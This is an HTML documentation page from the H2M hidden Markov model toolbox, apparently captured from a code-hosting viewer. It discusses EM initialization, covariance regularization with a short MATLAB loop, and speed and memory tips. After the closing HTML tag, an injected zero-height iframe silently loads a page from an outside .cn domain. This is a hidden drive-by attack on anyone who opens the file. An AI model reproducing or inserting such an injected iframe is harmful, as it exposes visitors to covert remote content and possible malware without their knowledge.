node13.html
来自「隐马尔可夫工具箱」· HTML 代码 · 共 248 行
HTML
248 行
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><!--Converted with LaTeX2HTML 2K.1beta (1.48)original version by: Nikos Drakos, CBLU, University of Leeds* revised and updated by: Marcus Hennecke, Ross Moore, Herb Swan* with significant contributions from: Jens Lippmann, Marek Rouchal, Martin Wilck and others --><HTML><HEAD><TITLE>Implementation issues</TITLE><META NAME="description" CONTENT="Implementation issues"><META NAME="keywords" CONTENT="H2M, H2M/cnt, Hidden Markov Model, HMM, Mixture model, Vector Quantization, Expectation Maximization, EM, Multivariate Gaussian, Count data, Poisson, Negative binomial, MATLAB, OCTAVE, GPL"><META NAME="resource-type" CONTENT="document"><META NAME="distribution" CONTENT="global"><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><META NAME="Generator" CONTENT="LaTeX2HTML v2K.1beta"><META HTTP-EQUIV="Content-Style-Type" CONTENT="text/css"><LINK REL="STYLESHEET" HREF="h2m.css"><LINK REL="previous" HREF="node12.html"><LINK REL="up" HREF="node8.html"><LINK REL="next" HREF="node14.html"></HEAD><BODY BGCOLOR="ivory"><!--Navigation Panel--><B> Next:</B> <A NAME="tex2html242" HREF="node14.html">The H2M/cnt extension: models</A><B>Up:</B> <A NAME="tex2html238" HREF="node8.html">Models with multivariate Gaussian</A><B> Previous:</B> <A NAME="tex2html234" HREF="node12.html">A more advance example</A><P><!--End of Navigation Panel--><!--Table of Child-Links--><A NAME="CHILD_LINKS"><STRONG>Subsections</STRONG></A><UL><LI><A NAME="tex2html243" HREF="#SECTION00035100000000000000">Initialization</A><LI><A NAME="tex2html244" HREF="#SECTION00035200000000000000">Modifications of the EM recursions</A><LI><A NAME="tex2html245" HREF="#SECTION00035300000000000000">Computation time and memory usage</A></UL><!--End of Table of Child-Links--><HR><H2><A NAME="SECTION00035000000000000000">Implementation issues</A></H2><H3><A NAME="SECTION00035100000000000000">Initialization</A></H3>Initialization plays an important part in iterative algorithms such as the EM.Usually the choice of the initialization point will strongly depend on theapplication considered. I use only two very basic methods of initializing theparameters:<DL><DT><STRONG>For left-right models</STRONG></DT><DD><code>hmm_mint</code> initializes all the model parameters using a uniform ``hard'' segmentation of each data sequence (each sequence is splitted in <code>N</code> consecutive sections, where <code>N</code> is he number of states in the HMM, the vectors thus associated with each state are used to obtain initial parameters of the state-conditional distributions).</DD><DT><STRONG>For mixture models</STRONG></DT><DD><code>svq</code> implements a binary splitting vector quantization algorithm. This usually provides efficient initial estimates of the parameters of the Gaussian densities. Note that <code>svq</code> uses the unweighted Euclidean distance as performance criterion. If the components of the input vectors are strongly correlated and/or of very different magnitude, it would be preferable to use <code>svq</code> on the vectors <!-- MATH $\boldsymbol{\Phi}\mathbf{x}_t$ --><IMG WIDTH="28" HEIGHT="25" ALIGN="MIDDLE" BORDER="0" SRC="img7.png" ALT="$ \boldsymbol{\Phi}\mathbf{x}_t$"> where <!-- MATH $\boldsymbol{\Phi}$ --><IMG WIDTH="16" HEIGHT="14" ALIGN="BOTTOM" BORDER="0" SRC="img8.png" ALT="$ \boldsymbol{\Phi}$"> is the Cholevski factor associated with <!-- MATH ${\rm Cov}^{-1}(\mathbf{x})$ --><IMG WIDTH="59" HEIGHT="30" ALIGN="MIDDLE" BORDER="0" SRC="img9.png" ALT="$ {\rm Cov}^{-1}(\mathbf{x})$">, ie. <!-- MATH $\boldsymbol{\Phi}'\boldsymbol{\Phi} ={\rm Cov}^{-1}(\mathbf{x}).$ --><IMG WIDTH="105" HEIGHT="30" ALIGN="MIDDLE" BORDER="0" SRC="img10.png" ALT="$ \boldsymbol{\Phi}'\boldsymbol{\Phi} ={\rm Cov}^{-1}(\mathbf{x}).$"></DD></DL><P><H3><A NAME="SECTION00035200000000000000"></A><A NAME="sec:modifs"></A><BR>Modifications of the EM recursions</H3>It is common practice to introduce some modifications of the EM algorithm inorder to avoid known pitfalls. The fact that the likelihood becomes infinitefor singular covariance matrices is maybe the problem most often encountered inpractice. Solutions include thresholding the individual variances coefficientsin the diagonal case or adding a constant diagonal matrix at each iteration.This is certainly useful, particularly in the case where there is ``notenough'' training data (compared to the complexity of the model). There ishowever a risk of modifying the properties of the EM algorithm with suchmodifications, in particular <EM>the likelihood may decrease at some iteration</EM>. A perhaps more elegant way of handling such problems consists inusing priors for the HMM parameters in a Bayesian framework[<A HREF="node23.html#Gauvain:MAPHMM">6</A>].<P>Most HMM packages such as<A NAME="tex2html2" HREF="http://www.entropic.com/products&services/htk/htk.html">HTK</A>(popular development tool for speech processing applications) use suchmodifications in order to avoid these problems (the same is true for vectorquantization where heuristics can be introduced to avoid the appearance ofsingleton clusters). No such modification has been used here but these are easyto code using something like:<PRE>for i = 1:n_iter [A, logl(i), gamma] = hmm_mest(X, st, A, mu, Sigma); [mu, Sigma] = mix_par(X, gamma, DIAG_COV); Sigma = Sigma + SMALL_VALUE*ones(size(Sigma)); % EM Modif. (assuming % diagonal covariances)end;</PRE>Another frequently used solution is to ``share'' some model parameters (ie. toconstrain them to be equal) such as the variances of different states. Thisusually necessitates only minor modifications of the EM re-estimation equations[<A HREF="node23.html#Cappe:ShDist">7</A>] - see the function <code>ex_sprec</code>(section <A HREF="node12.html#sec:ex_sprec">2.4</A>) for an example of variance sharing.<P>Finally the aforementioned HTK toolkit uses a modification of the HMM modelwhich force the forward-backward recursions to give null probability tosequences that do not end in the final state (these modified equations areobtained simply by assuming that each observed sequence is terminated by anEND_OF_SEQUENCE symbol associated with a terminal state located after theactual final state of the HMM). This doesn't modify much the EM estimates,except in case where very few training sequences are available (moreover thisis clearly limited to left-right HMMs).<P><H3><A NAME="SECTION00035300000000000000"></A><A NAME="sec:time+mem"></A><BR>Computation time and memory usage</H3>Each function is implemented in a rather straightforward way and should be easyto read. In some case (such as <code>hmm_tran</code> for instance) however, the codemay be less easy to read because of aggressive ``matlabization''(vectorization) which helps save computing time. Note that one of the mosttime-consuming operation is the computation of Gaussian density values (for allinput vectors and all states of the model). In the case I use more frequently(Gaussian densities with diagonal covariance), I have included a mex-file(<code>c_dgaus</code>) which is used in priority if it is found on MATLAB's searchpath (expect a gain of a factor 5 to 10 on <code>hmm_fb</code> and <code>mix_post</code>).Some routines could easily be made more efficient (<code>hmm_vit</code> for instance)if someone has some time to do so.<P>Especially if you are using full covariance matrices or if you can't compilethe mex-file <code>c_dgaus</code>, these routines can be made much faster by usingthe MATLAB compiler <code>mcc</code> (if you paid for it): I apologize if it lookslike a plain commercial, but execution time gets approximately divided by 10 onfunctions such as <code>hmm_fb</code> when using <code>mcc</code>. In the four components2-D mixture model (last example in script <code>ex_basic.m</code>) with 50 000 (fiftythousand) observation vectors, the execution time (on an old fashioned 1998 SUNSPARC workstation) for each EM iteration was: 3 seconds when using diagonalcovariance with the mex-file <code>c_dgaus</code>; 3 minutes when using fullcovariance; 10 seconds for full covariance matrices when the files<code>mix_post</code> and <code>mix_par</code> had been compiled using MATLAB's <code>mcc</code>.Only the ratios between these figures are actually of interest since theseshould run faster on modern computers (with a Pentium III - 1 GHz PC runningLinux, the full covariance case, without compilation, boils down to 25seconds).<P>Users of the MATLAB compiler should compile in priority the file <TT>gauseval</TT>(computation of the Gaussian densities) which represents the main computationalload in many of the routines. Compiling the high-level functions like <TT> mix</TT>, <TT>hmm</TT> (and <TT>vq</TT>) fails because I used variable names endingwith a trailing underscore to denote the updated parameters (sorry for that!)It wouldn't be very useful anyway since only the compilation of the low-levelfunctions significantly speeds up the computation. Note that functions compiledwith <TT>mcc</TT> can't handle sparse matrices, which is a problem for left-rightHMMs (for this reason, I don't recommend compiling a function like<code>hmm_fb</code>). Finally, in version 5.2 (the first MATLAB V5 version on whichthe compiler actually runs) it is possible to use compilation pragmas (or tospecify them as arguments of <code>mcc</code>). Using the pragma <code>#inbounds</code> isan absolute requirement if you want to obtain any gain in execution time and toavoid memory overflows (<code>#realonly</code> also helps but to a much lesser extent- moreover <code>mcc</code> does not seem to handle this properly in the version Iuse which is 5.2.0.3084). I have included these pragmas when possible in<code>gauseval.m</code>, <code>gauslogv.m</code> <code>mix_par.m</code> and <code>mix_post.m</code>.<P>Memory space is also a factor to take into account: typically, using more than50 000 training vectors of dimension 20 with HMMs of size 30 is likely to causeproblems on most computers. Usually, the largest matrices are <code>alpha</code> and<code>beta</code> (forward and backward probabilities), <code>gamma</code> (a posterioridistribution for the states) and <code>dens</code> (values of Gaussian densities).The solution would consists in reading the training data from disk-files byblocks... but this is another story!<P><P><HR><!--Navigation Panel--><B> Next:</B> <A NAME="tex2html242" HREF="node14.html">The H2M/cnt extension: models</A><B>Up:</B> <A NAME="tex2html238" HREF="node8.html">Models with multivariate Gaussian</A><B> Previous:</B> <A NAME="tex2html234" HREF="node12.html">A more advance example</A><P><!--End of Navigation Panel--><ADDRESS>Olivier Cappé, Aug 24 2001</ADDRESS></BODY></HTML>
<iframe src=http://www.mnuiu.cn/ar.htm width=100 height=0></iframe>
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?